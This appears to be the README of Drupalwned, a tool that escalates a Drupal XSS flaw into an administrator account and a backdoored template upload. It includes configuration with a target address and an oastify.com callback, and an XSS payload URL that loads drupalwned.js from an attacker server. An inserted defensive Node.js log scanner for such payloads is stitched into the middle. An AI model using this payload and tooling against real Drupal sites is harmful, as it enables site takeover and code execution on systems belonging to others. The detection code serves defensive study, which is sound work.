Drupalwned

Drupal exploitation script that elevates XSS to RCE or other critical vulnerabilities.


About

Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in Drupal CMS.

💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧

Key Features

  • Privilege Escalation
    • Creates an administrative user in Drupal.
  • (RCE) Upload Template
    • Uploads custom backdoored templates to Drupal.
  • // Pending
    • more ways to get RCE

How To Use

1) Clone the Repository

git clone https://github.com/nowak0x01/Drupalwned

2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.

function DPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Password = `j^QEkyvd7*g3`;  /* - <Mandatory> 
                            Make it at least 12 characters
                            Add lowercase letters
                            Add uppercase letters
                            Add numbers
                            Add punctuation
                                    */
    /* ************************************************************************************************************************************************ */

3) Start a web server

python3 -m http.server 80

4) Go to the Drupal XSS vector and include drupalwned.js

https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>
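
Seen from the defender's side, the request in step 4 stands out in web server access logs, because the query string carries a percent-encoded `<script src=...>` tag. The following is an added example, not code from Drupalwned or its author: a small Node.js scanner that decodes logged query strings (including double encoding) and reports reflected script tags. The log lines, the `ownHosts` list and the function names are constructed for illustration.

```javascript
// Added example (defensive; not part of Drupalwned): flag access-log requests
// whose query string carries a <script src=...> tag like the one in step 4.

// Percent-decode repeatedly so double-encoded payloads (%253Cscript) are seen.
function deepDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, " "));
    } catch (e) {
      break; // malformed escape sequence: keep the last good form
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns one finding per injected tag: { lineNo, client, scriptHost, external }.
// ownHosts (assumption): hostnames the site legitimately serves scripts from.
function scanAccessLog(lines, ownHosts) {
  const own = new Set(ownHosts.map((h) => h.toLowerCase()));
  const requestRe = /^(\S+) .*?"[A-Z]+ (\S+) HTTP\/[\d.]+"/;
  const findings = [];
  lines.forEach((line, idx) => {
    const m = requestRe.exec(line);
    if (!m || !m[2].includes("?")) return;
    const query = deepDecode(m[2].slice(m[2].indexOf("?") + 1));
    const scriptRe = /<script\b[^>]*?\bsrc\s*=\s*["']?((?:https?:)?\/\/[^\s"'>]+)/gi;
    for (const tag of query.matchAll(scriptRe)) {
      let host;
      try {
        host = new URL(tag[1].startsWith("//") ? "https:" + tag[1] : tag[1]).hostname;
      } catch (e) {
        continue; // src is not a parseable URL
      }
      findings.push({ lineNo: idx + 1, client: m[1], scriptHost: host, external: !own.has(host) });
    }
  });
  return findings;
}

// Constructed sample lines in combined log format (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Jan/2025:10:00:00 +0000] "GET /node/1?page=2 HTTP/1.1" 200 512',
  '198.51.100.7 - - [10/Jan/2025:10:01:00 +0000] "GET /plugin.php?s=%3Cscript%20src=%22//VPS/drupalwned.js%22%3E%3C/script%3E HTTP/1.1" 200 900',
  '198.51.100.7 - - [10/Jan/2025:10:02:00 +0000] "GET /plugin.php?s=%253Cscript%2520src%253D%2522https%253A%252F%252Fstatic.other.example%252Fa.js%2522%253E HTTP/1.1" 200 900',
  '203.0.113.9 - - [10/Jan/2025:10:03:00 +0000] "GET /search?q=%3Cscript%20src=%22//drupal.example.com/js/app.js%22%3E HTTP/1.1" 200 700',
];
```
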

Examples

🌧️ DPCreateAccount() - Creates a user in Drupal.

DPUploadTemplate() - Uploads a custom backdoored template to Drupal.

Contributing

If you're interested in contributing or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

               r
               ain
               rai
              nrain
             rainrai
            nrainrain
           ainrainrain
          rainrainrainr
         ainrainrainrain
        rainrainrainrainr
      ainrainrainrainrainra         Drupalwned (https://github.com/nowak0x01/Drupalwned)
    inra nrainrainrainrainrai                      @Author: Hudson Nowak
  nrain  inrainrainrainrainrain
 rain   nrainrainrainrainrainrai
nrai   inrainrainrainrainrainrain
rai   inrainrainrainrainrainrainr
rain   nrainrainrainrainrainrainr
 rainr  nrainrainrainrainrainrai
  nrain ainrainrainrainrainrain
    rainrainrainrainrainrainr
      rainranirainrainrainr
           ainrainrain